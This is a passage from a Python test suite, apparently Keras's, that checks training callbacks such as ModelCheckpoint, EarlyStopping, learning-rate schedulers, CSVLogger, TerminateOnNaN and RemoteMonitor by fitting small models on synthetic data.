filepath = os.path.join(temp_dir, 'checkpoint.epoch{epoch:02d}batch{batch:02d}.h5') cbks = [ keras.callbacks.ModelCheckpoint(filepath, monitor=monitor, save_freq=1) ] assert not os.path.exists(filepath.format(epoch=1, batch=1)) assert not os.path.exists(filepath.format(epoch=1, batch=2)) assert not os.path.exists(filepath.format(epoch=2, batch=1)) assert not os.path.exists(filepath.format(epoch=2, batch=2)) assert not os.path.exists(filepath.format(epoch=3, batch=1)) assert not os.path.exists(filepath.format(epoch=3, batch=2)) assert not os.path.exists(filepath.format(epoch=4, batch=1)) assert not os.path.exists(filepath.format(epoch=4, batch=2)) assert not os.path.exists(filepath.format(epoch=5, batch=1)) assert not os.path.exists(filepath.format(epoch=5, batch=2)) model.fit( x_train, y_train, batch_size=5, validation_data=(x_test, y_test), callbacks=cbks, epochs=5, verbose=1) assert os.path.exists(filepath.format(epoch=1, batch=1)) assert os.path.exists(filepath.format(epoch=1, batch=2)) assert os.path.exists(filepath.format(epoch=2, batch=1)) assert os.path.exists(filepath.format(epoch=2, batch=2)) assert os.path.exists(filepath.format(epoch=3, batch=1)) assert os.path.exists(filepath.format(epoch=3, batch=2)) assert os.path.exists(filepath.format(epoch=4, batch=1)) assert os.path.exists(filepath.format(epoch=4, batch=2)) assert os.path.exists(filepath.format(epoch=5, batch=1)) assert os.path.exists(filepath.format(epoch=5, batch=2)) os.remove(filepath.format(epoch=1, batch=1)) os.remove(filepath.format(epoch=1, batch=2)) os.remove(filepath.format(epoch=2, batch=1)) os.remove(filepath.format(epoch=2, batch=2)) os.remove(filepath.format(epoch=3, batch=1)) os.remove(filepath.format(epoch=3, batch=2)) os.remove(filepath.format(epoch=4, batch=1)) os.remove(filepath.format(epoch=4, batch=2)) os.remove(filepath.format(epoch=5, batch=1)) os.remove(filepath.format(epoch=5, batch=2)) # Case 12: ModelCheckpoint saves model with initial_value_threshold param mode = 'max' monitor = 'val_acc' initial_value_threshold = 0 save_best_only = True filepath = os.path.join(temp_dir, 'checkpoint.h5') cbks = [ keras.callbacks.ModelCheckpoint( filepath, monitor=monitor, save_best_only=save_best_only, initial_value_threshold=initial_value_threshold, mode=mode) ] model.fit( x_train, y_train, batch_size=BATCH_SIZE, validation_data=(x_test, y_test), callbacks=cbks, epochs=1, verbose=0) assert os.path.exists(filepath) os.remove(filepath) # Case 13: ModelCheckpoint saves model with initial_value_threshold param mode = 'auto' monitor = 'val_loss' initial_value_threshold = None save_best_only = True cbks = [ keras.callbacks.ModelCheckpoint( filepath, monitor=monitor, save_best_only=save_best_only, initial_value_threshold=initial_value_threshold, mode=mode) ] model.fit( x_train, y_train, batch_size=BATCH_SIZE, validation_data=(x_test, y_test), callbacks=cbks, epochs=1, verbose=0) assert os.path.exists(filepath) os.remove(filepath) # Case 14: ModelCheckpoint doesnt save model if loss was minimum earlier mode = 'min' monitor = 'val_loss' initial_value_threshold = 0 save_best_only = True cbks = [ keras.callbacks.ModelCheckpoint( filepath, monitor=monitor, save_best_only=save_best_only, initial_value_threshold=initial_value_threshold, mode=mode) ] model.fit( x_train, y_train, batch_size=BATCH_SIZE, validation_data=(x_test, y_test), callbacks=cbks, epochs=1, verbose=0) assert not os.path.exists(filepath) # Case 15: ModelCheckpoint doesnt save model if loss was min earlier in auto # mode mode = 'auto' monitor = 'val_loss' 
initial_value_threshold = 0 save_best_only = True cbks = [ keras.callbacks.ModelCheckpoint( filepath, monitor=monitor, save_best_only=save_best_only, initial_value_threshold=initial_value_threshold, mode=mode) ] model.fit( x_train, y_train, batch_size=BATCH_SIZE, validation_data=(x_test, y_test), callbacks=cbks, epochs=1, verbose=0) assert not os.path.exists(filepath) @test_utils.run_v2_only def test_ModelCheckpoint_subclass_save_weights_false(self): model = test_utils.get_small_subclass_mlp(NUM_HIDDEN, NUM_CLASSES) model.compile( loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc']) temp_dir = self.get_temp_dir() self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True) filepath = os.path.join(temp_dir, 'checkpoint') cbks = [keras.callbacks.ModelCheckpoint( filepath, save_weights_only=False)] (x_train, y_train), _ = test_utils.get_test_data( train_samples=TRAIN_SAMPLES, test_samples=TEST_SAMPLES, input_shape=(INPUT_DIM,), num_classes=NUM_CLASSES) y_train = np_utils.to_categorical(y_train, num_classes=NUM_CLASSES) model.fit( x_train, y_train, callbacks=cbks, epochs=1, verbose=0) # Check that the filepath is a SavedModel directory. self.assertIn('saved_model.pb', os.listdir(filepath)) def _get_dummy_resource_for_model_checkpoint_testing(self): def get_input_datasets(): # Simple training input. train_input = [[1.]] * 16 train_label = [[0.]] * 16 ds = tf.data.Dataset.from_tensor_slices((train_input, train_label)) return ds.batch(8, drop_remainder=True) # Very simple bias model to eliminate randomness. optimizer = gradient_descent.SGD(0.1) model = sequential.Sequential() model.add(test_utils.Bias(input_shape=(1,))) model.compile(loss='mae', optimizer=optimizer, metrics=['mae']) train_ds = get_input_datasets() temp_dir = self.get_temp_dir() filepath = os.path.join(temp_dir, 'checkpoint.epoch{epoch:02d}.h5') # The filepath shouldn't exist at the beginning. self.assertFalse(os.path.exists(filepath)) callback = keras.callbacks.ModelCheckpoint( filepath=filepath, save_weights_only=True) return model, train_ds, callback, filepath def _run_load_weights_on_restart_test_common_iterations(self): (model, train_ds, callback, filepath) = self._get_dummy_resource_for_model_checkpoint_testing() initial_epochs = 3 model.fit(train_ds, epochs=initial_epochs, callbacks=[callback]) # The files should exist after fitting with callback. for epoch in range(initial_epochs): self.assertTrue(os.path.exists(filepath.format(epoch=epoch + 1))) self.assertFalse(os.path.exists(filepath.format(epoch=initial_epochs + 1))) self.assertEqual( callback._get_most_recently_modified_file_matching_pattern(filepath), filepath.format(epoch=initial_epochs)) model.fit(train_ds, epochs=1) weights_after_one_more_epoch = model.get_weights() # The filepath should continue to exist after fitting without callback. for epoch in range(initial_epochs): self.assertTrue(os.path.exists(filepath.format(epoch=epoch + 1))) return model, train_ds, filepath, weights_after_one_more_epoch @staticmethod def get_ModelCheckpoint_load_weights_on_restart_true_test(save_weights_only): def func(self): (model, train_ds, filepath, weights_after_one_more_epoch ) = self._run_load_weights_on_restart_test_common_iterations() # Sleep for some short time period ensuring the files are created with # a different time (in MacOS OSS the granularity is only 1 second). 
time.sleep(2) callback = keras.callbacks.ModelCheckpoint( filepath=filepath, save_weights_only=save_weights_only, load_weights_on_restart=True) model.fit(train_ds, epochs=1, callbacks=[callback]) weights_after_model_restoring_and_one_more_epoch = model.get_weights() self.assertEqual( callback._get_most_recently_modified_file_matching_pattern(filepath), filepath.format(epoch=1)) model.fit( train_ds, epochs=1, callbacks=[ keras.callbacks.ModelCheckpoint( filepath=filepath, save_weights_only=save_weights_only, load_weights_on_restart=True) ]) weights_with_one_final_extra_epoch = model.get_weights() # Asserting the weights one epoch after initial fitting and another epoch # after that are closed, if a ModelCheckpoint with # load_weights_on_restart=True is given (so the model is restored at the # beginning of training). self.assertAllClose(weights_after_one_more_epoch, weights_after_model_restoring_and_one_more_epoch) self.assertNotAllClose(weights_after_one_more_epoch, weights_with_one_final_extra_epoch) return func @staticmethod def get_ModelCheckpoint_load_weights_on_restart_false_test(save_weights_only): def func(self): (model, train_ds, filepath, weights_after_one_more_epoch ) = self._run_load_weights_on_restart_test_common_iterations() model.fit( train_ds, epochs=1, callbacks=[ keras.callbacks.ModelCheckpoint( filepath=filepath, save_weights_only=save_weights_only) ]) weights_after_model_restoring_and_one_more_epoch = model.get_weights() # Asserting the weights one epoch after initial fitting and another epoch # after that are different, if a ModelCheckpoint with # load_weights_on_restart=False is given (so the model is not restored at # the beginning of training). self.assertNotAllClose(weights_after_one_more_epoch, weights_after_model_restoring_and_one_more_epoch) return func test_model_checkpoint_load_weights_on_restart_true_save_weights_only_true = \ get_ModelCheckpoint_load_weights_on_restart_true_test.__func__(True) test_model_checkpoint_load_weights_on_restart_true_save_weights_only_false = \ get_ModelCheckpoint_load_weights_on_restart_true_test.__func__(False) test_model_checkpoint_load_weights_on_restart_false_save_weights_only_true = \ get_ModelCheckpoint_load_weights_on_restart_false_test.__func__(True) test_model_checkpoint_load_weights_on_restart_false_save_weights_only_false \ = get_ModelCheckpoint_load_weights_on_restart_false_test.__func__(False) def test_ModelCheckpoint_override_if_file_exist(self): (model, train_ds, filepath, _) = self._run_load_weights_on_restart_test_common_iterations() # Sleep for some short time period to ensure the files are created with # a different time (in MacOS OSS the granularity is only 1 second). 
time.sleep(2) callback = keras.callbacks.ModelCheckpoint( filepath=filepath, save_weights_only=True) model.load_weights( callback._get_most_recently_modified_file_matching_pattern(filepath)) weights_before_additional_fit = model.get_weights() model.fit(train_ds, epochs=1, callbacks=[callback]) model.load_weights( callback._get_most_recently_modified_file_matching_pattern(filepath)) weights_after_additional_fit = model.get_weights() self.assertNotAllClose(weights_before_additional_fit, weights_after_additional_fit) def test_fit_with_ModelCheckpoint_with_tf_config(self): (model, train_ds, callback, _) = self._get_dummy_resource_for_model_checkpoint_testing() os.environ['TF_CONFIG'] = json.dumps({ 'cluster': { 'worker': ['localhost:23333'] }, 'task': { 'type': 'worker', 'index': 0 } }) # `model.fit()` should work regardless of the presence of `TF_CONFIG`. model.fit(train_ds, epochs=1, callbacks=[callback]) def test_fit_with_ModelCheckpoint_with_dir_as_h5_filepath(self): (model, train_ds, callback, filepath) = self._get_dummy_resource_for_model_checkpoint_testing() temp_dir = self.get_temp_dir() filepath = os.path.join(temp_dir, 'temp.h5') self.assertFalse(os.path.exists(filepath)) os.mkdir(filepath) self.assertTrue(os.path.exists(filepath)) callback = keras.callbacks.ModelCheckpoint(filepath=filepath) with self.assertRaisesRegex( IOError, 'Please specify a non-directory ' 'filepath for ModelCheckpoint.'): model.fit(train_ds, epochs=1, callbacks=[callback]) def test_ModelCheckpoint_with_bad_path_placeholders(self): (model, train_ds, callback, filepath) = self._get_dummy_resource_for_model_checkpoint_testing() temp_dir = self.get_temp_dir() filepath = os.path.join(temp_dir, 'chkpt_{epoch:02d}_{mape:.2f}.h5') callback = keras.callbacks.ModelCheckpoint(filepath=filepath) with self.assertRaisesRegex(KeyError, 'Failed to format this callback ' 'filepath.*'): model.fit(train_ds, epochs=1, callbacks=[callback]) def test_ModelCheckpoint_nonblocking(self): filepath = self.get_temp_dir() # Should only cause a sync block when saving is actually performed. callback = keras.callbacks.ModelCheckpoint(filepath=filepath, save_freq=100) self.assertTrue(callback._supports_tf_logs) model = keras.Sequential([keras.layers.Dense(1)]) cb_list = keras.callbacks.CallbackList([callback], model=model, epochs=1, steps=10, verbose=0) tensor = tf.convert_to_tensor(1.) 
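    # Monkey-patch the log tensor's `.numpy()` so that any attempt to convert
    # it to NumPy raises. With `save_freq=100` and only a single batch run
    # below, ModelCheckpoint never saves, so none of the hook calls should
    # trigger such a blocking conversion.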
    def mock_numpy():
      raise RuntimeError(
          'If this error is seen, ModelCheckpoint is causing a blocking '
          'NumPy conversion even when not checkpointing.')

    tensor.numpy = mock_numpy
    logs = {'metric': tensor}

    cb_list.on_train_begin(logs)
    cb_list.on_epoch_begin(0, logs)
    cb_list.on_train_batch_begin(0, logs)
    cb_list.on_train_batch_end(0, logs)
    cb_list.on_epoch_end(0, logs)
    cb_list.on_train_end(logs)

    cb_list.on_test_begin(logs)
    cb_list.on_test_batch_begin(0, logs)
    cb_list.on_test_batch_end(0, logs)
    cb_list.on_test_end(logs)

    cb_list.on_predict_begin(logs)
    cb_list.on_predict_batch_begin(logs)
    cb_list.on_predict_batch_end(logs)
    cb_list.on_predict_end(logs)

  def test_verbose_2_logging(self):
    data = np.random.random((100, 1))
    labels = np.where(data > 0.5, 1, 0)
    model = keras.models.Sequential((keras.layers.Dense(
        1, input_dim=1, activation='relu'), keras.layers.Dense(
            1, activation='sigmoid'),))
    model.compile(
        optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy'])
    expected_log = r'(.*- loss:.*- acc.*:.*epoch)+'
    with self.captureWritesToStream(sys.stdout) as printed:
      model.fit(data, labels, verbose=2, epochs=20)
      self.assertRegex(printed.contents(), expected_log)

  def test_ProgbarLogger_verbose_2_nonblocking(self):
    # Should only cause a sync block on epoch end methods.
    callback = keras.callbacks.ProgbarLogger(count_mode='steps')
    self.assertTrue(callback._supports_tf_logs)
    model = keras.Sequential([keras.layers.Dense(1)])
    cb_list = keras.callbacks.CallbackList([callback],
                                           model=model,
                                           epochs=1,
                                           steps=10,
                                           verbose=2)

    tensor = tf.convert_to_tensor(1.)

    def mock_numpy():
      raise RuntimeError(
          'If this error is seen, ProgbarLogger is causing a blocking '
          'NumPy conversion before epoch end.')

    tensor.numpy = mock_numpy
    logs = {'metric': tensor}

    cb_list.on_train_begin(logs)
    cb_list.on_epoch_begin(0, logs)
    cb_list.on_train_batch_begin(0, logs)
    cb_list.on_train_batch_end(0, logs)

    cb_list.on_test_begin(logs)
    cb_list.on_test_batch_begin(0, logs)
    cb_list.on_test_batch_end(0, logs)
    cb_list.on_test_end(logs)

    with self.assertRaisesRegex(RuntimeError, 'NumPy conversion'):
      # on_epoch_end should still block.
cb_list.on_epoch_end(0, logs) cb_list.on_train_end(logs) def test_EarlyStopping(self): with self.cached_session(): np.random.seed(123) (x_train, y_train), (x_test, y_test) = test_utils.get_test_data( train_samples=TRAIN_SAMPLES, test_samples=TEST_SAMPLES, input_shape=(INPUT_DIM,), num_classes=NUM_CLASSES) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) model = test_utils.get_small_sequential_mlp( num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM) model.compile( loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc']) cases = [ ('max', 'val_acc'), ('min', 'val_loss'), ('auto', 'val_acc'), ('auto', 'loss'), ('unknown', 'unknown') ] for mode, monitor in cases: patience = 0 cbks = [ keras.callbacks.EarlyStopping( patience=patience, monitor=monitor, mode=mode) ] model.fit( x_train, y_train, batch_size=BATCH_SIZE, validation_data=(x_test, y_test), callbacks=cbks, epochs=5, verbose=0) def test_EarlyStopping_reuse(self): with self.cached_session(): np.random.seed(1337) patience = 3 data = np.random.random((100, 1)) labels = np.where(data > 0.5, 1, 0) model = keras.models.Sequential((keras.layers.Dense( 1, input_dim=1, activation='relu'), keras.layers.Dense( 1, activation='sigmoid'),)) model.compile( optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy']) weights = model.get_weights() # This should allow training to go for at least `patience` epochs model.set_weights(weights) stopper = keras.callbacks.EarlyStopping(monitor='acc', patience=patience) hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20) assert len(hist.epoch) >= patience def test_EarlyStopping_with_baseline(self): with self.cached_session(): np.random.seed(1337) baseline = 0.6 (data, labels), _ = test_utils.get_test_data( train_samples=100, test_samples=50, input_shape=(1,), num_classes=NUM_CLASSES) model = test_utils.get_small_sequential_mlp( num_hidden=1, num_classes=1, input_dim=1) model.compile( optimizer='sgd', loss='binary_crossentropy', metrics=['acc']) stopper = keras.callbacks.EarlyStopping(monitor='acc', baseline=baseline) hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20) assert len(hist.epoch) == 2 patience = 3 stopper = keras.callbacks.EarlyStopping(monitor='acc', patience=patience, baseline=baseline) hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20) assert len(hist.epoch) >= patience def test_EarlyStopping_final_weights_when_restoring_model_weights(self): class DummyModel: def __init__(self): self.stop_training = False self.weights = -1 def get_weights(self): return self.weights def set_weights(self, weights): self.weights = weights def set_weight_to_epoch(self, epoch): self.weights = epoch early_stop = keras.callbacks.EarlyStopping(monitor='val_loss', patience=2, restore_best_weights=True) early_stop.model = DummyModel() losses = [0.2, 0.15, 0.1, 0.11, 0.12] # The best configuration is in the epoch 2 (loss = 0.1000). epochs_trained = 0 early_stop.on_train_begin() for epoch in range(len(losses)): epochs_trained += 1 early_stop.model.set_weight_to_epoch(epoch=epoch) early_stop.on_epoch_end(epoch, logs={'val_loss': losses[epoch]}) if early_stop.model.stop_training: break # The best configuration is in epoch 2 (loss = 0.1000), # and while patience = 2, we're restoring the best weights, # so we end up at the epoch with the best weights, i.e. epoch 2 self.assertEqual(early_stop.model.get_weights(), 2) # Check early stopping when no model beats the baseline. 
early_stop = keras.callbacks.EarlyStopping( monitor='val_loss', patience=5, baseline=0.5, restore_best_weights=True) early_stop.model = DummyModel() losses = [0.9, 0.8, 0.7, 0.71, 0.72, 0.73] # The best configuration is in the epoch 2 (loss = 0.7000). epochs_trained = 0 early_stop.on_train_begin() for epoch in range(len(losses)): epochs_trained += 1 early_stop.model.set_weight_to_epoch(epoch=epoch) early_stop.on_epoch_end(epoch, logs={'val_loss': losses[epoch]}) if early_stop.model.stop_training: break # No epoch improves on the baseline, so we should train for only 5 epochs, # and restore the second model. self.assertEqual(epochs_trained, 5) self.assertEqual(early_stop.model.get_weights(), 2) def test_RemoteMonitor(self): if requests is None: self.skipTest('`requests` required to run this test') return None monitor = keras.callbacks.RemoteMonitor() # This will raise a warning since the default address in unreachable: monitor.on_epoch_end(0, logs={'loss': 0.}) def test_LearningRateScheduler(self): with self.cached_session(): np.random.seed(1337) (x_train, y_train), (x_test, y_test) = test_utils.get_test_data( train_samples=TRAIN_SAMPLES, test_samples=TEST_SAMPLES, input_shape=(INPUT_DIM,), num_classes=NUM_CLASSES) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) model = test_utils.get_small_sequential_mlp( num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM) model.compile( loss='categorical_crossentropy', optimizer='sgd', metrics=['accuracy']) cbks = [ keras.callbacks.LearningRateScheduler( lambda x: 1. / (1. + x), verbose=1) ] io_utils.enable_interactive_logging() with self.captureWritesToStream(sys.stdout) as printed: model.fit( x_train, y_train, batch_size=BATCH_SIZE, validation_data=(x_test, y_test), callbacks=cbks, epochs=5) self.assertIn('LearningRateScheduler setting learning rate to 1.0', printed.contents()) assert ( float(keras.backend.get_value( model.optimizer.lr)) - 0.2) < keras.backend.epsilon() cbks = [keras.callbacks.LearningRateScheduler(lambda x, lr: lr / 2)] model.compile( loss='categorical_crossentropy', optimizer='sgd', metrics=['accuracy']) model.fit( x_train, y_train, batch_size=BATCH_SIZE, validation_data=(x_test, y_test), callbacks=cbks, epochs=2, verbose=0) assert ( float(keras.backend.get_value( model.optimizer.lr)) - 0.01 / 4) < keras.backend.epsilon() cbks = [ keras.callbacks.LearningRateScheduler( lambda epoch, _: learning_rate_schedule.CosineDecay(0.01, 2) (epoch)) ] model.compile( loss='categorical_crossentropy', optimizer='sgd', metrics=['accuracy']) model.fit( x_train, y_train, batch_size=BATCH_SIZE, validation_data=(x_test, y_test), callbacks=cbks, epochs=2, verbose=0) cosine_decay_np = 0.5 * (1 + np.cos(np.pi * (1 / 2))) decayed_learning_rate = 0.01 * cosine_decay_np assert (float(keras.backend.get_value(model.optimizer.lr)) - decayed_learning_rate) < keras.backend.epsilon() def test_ReduceLROnPlateau(self): with self.cached_session(): np.random.seed(1337) (x_train, y_train), (x_test, y_test) = test_utils.get_test_data( train_samples=TRAIN_SAMPLES, test_samples=TEST_SAMPLES, input_shape=(INPUT_DIM,), num_classes=NUM_CLASSES) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) def make_model(): tf.compat.v1.set_random_seed(1234) np.random.seed(1337) model = test_utils.get_small_sequential_mlp( num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM) model.compile( loss='categorical_crossentropy', optimizer=gradient_descent.SGD(lr=0.1)) return model # TODO(psv): 
Make sure the callback works correctly when min_delta is # set as 0. Test fails when the order of this callback and assertion is # interchanged. model = make_model() cbks = [ keras.callbacks.ReduceLROnPlateau( monitor='val_loss', factor=0.1, min_delta=0, patience=1, cooldown=5) ] model.fit( x_train, y_train, batch_size=BATCH_SIZE, validation_data=(x_test, y_test), callbacks=cbks, epochs=2, verbose=0) self.assertAllClose( float(keras.backend.get_value(model.optimizer.lr)), 0.1, atol=1e-4) model = make_model() # This should reduce the LR after the first epoch (due to high epsilon). cbks = [ keras.callbacks.ReduceLROnPlateau( monitor='val_loss', factor=0.1, min_delta=10, patience=1, cooldown=5) ] model.fit( x_train, y_train, batch_size=BATCH_SIZE, validation_data=(x_test, y_test), callbacks=cbks, epochs=2, verbose=2) self.assertAllClose( float(keras.backend.get_value(model.optimizer.lr)), 0.01, atol=1e-4) def test_ReduceLROnPlateau_patience(self): class DummyOptimizer: def __init__(self): self.lr = keras.backend.variable(1.0) class DummyModel: def __init__(self): self.optimizer = DummyOptimizer() reduce_on_plateau = keras.callbacks.ReduceLROnPlateau( monitor='val_loss', patience=2) reduce_on_plateau.model = DummyModel() losses = [0.0860, 0.1096, 0.1040] lrs = [] for epoch in range(len(losses)): reduce_on_plateau.on_epoch_end(epoch, logs={'val_loss': losses[epoch]}) lrs.append(keras.backend.get_value(reduce_on_plateau.model.optimizer.lr)) # The learning rates should be 1.0 except the last one for lr in lrs[:-1]: self.assertEqual(lr, 1.0) self.assertLess(lrs[-1], 1.0) def test_ReduceLROnPlateau_backwards_compatibility(self): with tf.compat.v1.test.mock.patch.object(logging, 'warning') as mock_log: reduce_on_plateau = keras.callbacks.ReduceLROnPlateau(epsilon=1e-13) self.assertRegex( str(mock_log.call_args), '`epsilon` argument is deprecated') self.assertFalse(hasattr(reduce_on_plateau, 'epsilon')) self.assertTrue(hasattr(reduce_on_plateau, 'min_delta')) self.assertEqual(reduce_on_plateau.min_delta, 1e-13) def test_CSVLogger(self): with self.cached_session(): np.random.seed(1337) temp_dir = self.get_temp_dir() self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True) filepath = os.path.join(temp_dir, 'log.tsv') sep = '\t' (x_train, y_train), (x_test, y_test) = test_utils.get_test_data( train_samples=TRAIN_SAMPLES, test_samples=TEST_SAMPLES, input_shape=(INPUT_DIM,), num_classes=NUM_CLASSES) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) def make_model(): np.random.seed(1337) model = test_utils.get_small_sequential_mlp( num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM) model.compile( loss='categorical_crossentropy', optimizer=gradient_descent.SGD(lr=0.1), metrics=['accuracy']) return model # case 1, create new file with defined separator model = make_model() cbks = [keras.callbacks.CSVLogger(filepath, separator=sep)] model.fit( x_train, y_train, batch_size=BATCH_SIZE, validation_data=(x_test, y_test), callbacks=cbks, epochs=1, verbose=0) assert os.path.exists(filepath) with open(filepath) as csvfile: dialect = csv.Sniffer().sniff(csvfile.read()) assert dialect.delimiter == sep del model del cbks # case 2, append data to existing file, skip header model = make_model() cbks = [keras.callbacks.CSVLogger(filepath, separator=sep, append=True)] model.fit( x_train, y_train, batch_size=BATCH_SIZE, validation_data=(x_test, y_test), callbacks=cbks, epochs=1, verbose=0) # case 3, reuse of CSVLogger object model.fit( x_train, y_train, 
batch_size=BATCH_SIZE, validation_data=(x_test, y_test), callbacks=cbks, epochs=2, verbose=0) with open(filepath) as csvfile: list_lines = csvfile.readlines() for line in list_lines: assert line.count(sep) == 4 assert len(list_lines) == 5 output = ' '.join(list_lines) assert len(re.findall('epoch', output)) == 1 os.remove(filepath) def test_stop_training_csv(self): # Test that using the CSVLogger callback with the TerminateOnNaN callback # does not result in invalid CSVs. np.random.seed(1337) tmpdir = self.get_temp_dir() self.addCleanup(shutil.rmtree, tmpdir, ignore_errors=True) with self.cached_session(): fp = os.path.join(tmpdir, 'test.csv') (x_train, y_train), (x_test, y_test) = test_utils.get_test_data( train_samples=TRAIN_SAMPLES, test_samples=TEST_SAMPLES, input_shape=(INPUT_DIM,), num_classes=NUM_CLASSES) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) cbks = [keras.callbacks.TerminateOnNaN(), keras.callbacks.CSVLogger(fp)] model = keras.models.Sequential() for _ in range(5): model.add(keras.layers.Dense(2, input_dim=INPUT_DIM, activation='relu')) model.add(keras.layers.Dense(NUM_CLASSES, activation='linear')) model.compile(loss='mean_squared_error', optimizer='rmsprop') def data_generator(): i = 0 max_batch_index = len(x_train) // BATCH_SIZE tot = 0 while 1: if tot > 3 * len(x_train): yield (np.ones([BATCH_SIZE, INPUT_DIM]) * np.nan, np.ones([BATCH_SIZE, NUM_CLASSES]) * np.nan) else: yield (x_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE], y_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE]) i += 1 tot += 1 i %= max_batch_index history = model.fit_generator(data_generator(), len(x_train) // BATCH_SIZE, validation_data=(x_test, y_test), callbacks=cbks, epochs=20) loss = history.history['loss'] assert len(loss) > 1 assert loss[-1] == np.inf or np.isnan(loss[-1]) values = [] with open(fp) as f: # On Windows, due to \r\n line ends, we may end up reading empty lines # after each line. Skip empty lines. values = [x for x in csv.reader(f) if x] assert 'nan' in values[-1], 'The last epoch was not logged.' 
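  # Illustrative sketch only: user code typically combines the two callbacks
  # exercised above along the lines of
  #   callbacks = [keras.callbacks.TerminateOnNaN(),
  #                keras.callbacks.CSVLogger('training.csv')]
  #   model.fit(x, y, epochs=10, callbacks=callbacks)
  # so that training stops on a NaN/Inf loss while the CSV log stays
  # parseable; the filename 'training.csv' is just a placeholder.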
@test_combinations.run_all_keras_modes(always_skip_v1=True) def test_TerminateOnNaN(self): np.random.seed(1337) (x_train, y_train), (x_test, y_test) = test_utils.get_test_data( train_samples=TRAIN_SAMPLES, test_samples=TEST_SAMPLES, input_shape=(INPUT_DIM,), num_classes=NUM_CLASSES) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) cbks = [keras.callbacks.TerminateOnNaN()] model = keras.models.Sequential() initializer = keras.initializers.Constant(value=1e5) for _ in range(5): model.add( keras.layers.Dense( 2, input_dim=INPUT_DIM, activation='relu', kernel_initializer=initializer)) model.add(keras.layers.Dense(NUM_CLASSES)) model.compile(loss='mean_squared_error', optimizer='rmsprop') history = model.fit( x_train, y_train, batch_size=BATCH_SIZE, validation_data=(x_test, y_test), callbacks=cbks, epochs=20) loss = history.history['loss'] self.assertEqual(len(loss), 1) self.assertTrue(np.isnan(loss[0]) or np.isinf(loss[0])) @unittest.skipIf( os.name == 'nt', 'use_multiprocessing=True does not work on windows properly.') def test_LambdaCallback(self): with self.cached_session(): np.random.seed(1337) (x_train, y_train), (x_test, y_test) = test_utils.get_test_data( train_samples=TRAIN_SAMPLES, test_samples=TEST_SAMPLES, input_shape=(INPUT_DIM,), num_classes=NUM_CLASSES) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) model = keras.models.Sequential() model.add( keras.layers.Dense( NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu')) model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax')) model.compile( loss='categorical_crossentropy', optimizer='sgd', metrics=['accuracy']) # Start an arbitrary process that should run during model # training and be terminated after training has completed. 
e = threading.Event() def target(): e.wait() t = threading.Thread(target=target) t.start() cleanup_callback = keras.callbacks.LambdaCallback( on_train_end=lambda logs: e.set()) cbks = [cleanup_callback] model.fit( x_train, y_train, batch_size=BATCH_SIZE, validation_data=(x_test, y_test), callbacks=cbks, epochs=5, verbose=0) t.join() assert not t.is_alive() def test_RemoteMonitor_np_array(self): if requests is None: self.skipTest('`requests` required to run this test') with tf.compat.v1.test.mock.patch.object(requests, 'post') as requests_post: monitor = keras.callbacks.RemoteMonitor(send_as_json=True) a = np.arange(1) # a 1 by 1 array logs = {'loss': 0., 'val': a} monitor.on_epoch_end(0, logs=logs) send = {'loss': 0., 'epoch': 0, 'val': 0} requests_post.assert_called_once_with( monitor.root + monitor.path, json=send, headers=monitor.headers) def test_RemoteMonitor_np_float32(self): if requests is None: self.skipTest('`requests` required to run this test') with tf.compat.v1.test.mock.patch.object(requests, 'post') as requests_post: monitor = keras.callbacks.RemoteMonitor(send_as_json=True) a = np.float32(1.0) # a float32 generic type logs = {'loss': 0., 'val': a} monitor.on_epoch_end(0, logs=logs) send = {'loss': 0., 'epoch': 0, 'val': 1.0} requests_post.assert_called_once_with( monitor.root + monitor.path, json=send, headers=monitor.headers) def test_RemoteMonitorWithJsonPayload(self): if requests is None: self.skipTest('`requests` required to run this test') return None with self.cached_session(): (x_train, y_train), (x_test, y_test) = test_utils.get_test_data( train_samples=TRAIN_SAMPLES, test_samples=TEST_SAMPLES, input_shape=(INPUT_DIM,), num_classes=NUM_CLASSES) y_test = keras.utils.np_utils.to_categorical(y_test) y_train = keras.utils.np_utils.to_categorical(y_train) model = keras.models.Sequential() model.add( keras.layers.Dense( NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu')) model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax')) model.compile( loss='categorical_crossentropy', optimizer='rmsprop', metrics=['accuracy']) cbks = [keras.callbacks.RemoteMonitor(send_as_json=True)] with tf.compat.v1.test.mock.patch.object(requests, 'post'): model.fit( x_train, y_train, batch_size=BATCH_SIZE, validation_data=(x_test, y_test), callbacks=cbks, epochs=1) def test_progbar_infers_steps(self): x, y = np.ones((10, 1)), np.ones((10, 1)) data = tf.data.Dataset.from_tensor_slices((x, y)).batch(2) data = data.filter(lambda x, y: True) # Unknown cardinality. 
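    # `Dataset.filter` makes the cardinality statically unknown, so the
    # ProgbarLogger cannot know the step count up front and has to infer the
    # target (10 samples / batch_size 2 = 5 steps) from the first epoch.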
    progbar = keras.callbacks.ProgbarLogger('steps')
    model = keras.Sequential([keras.layers.Dense(1)])
    model.compile('sgd', 'mse')
    self.assertIsNone(progbar.target)
    model.fit(data, epochs=2, callbacks=[progbar])
    self.assertEqual(progbar.target, 5)

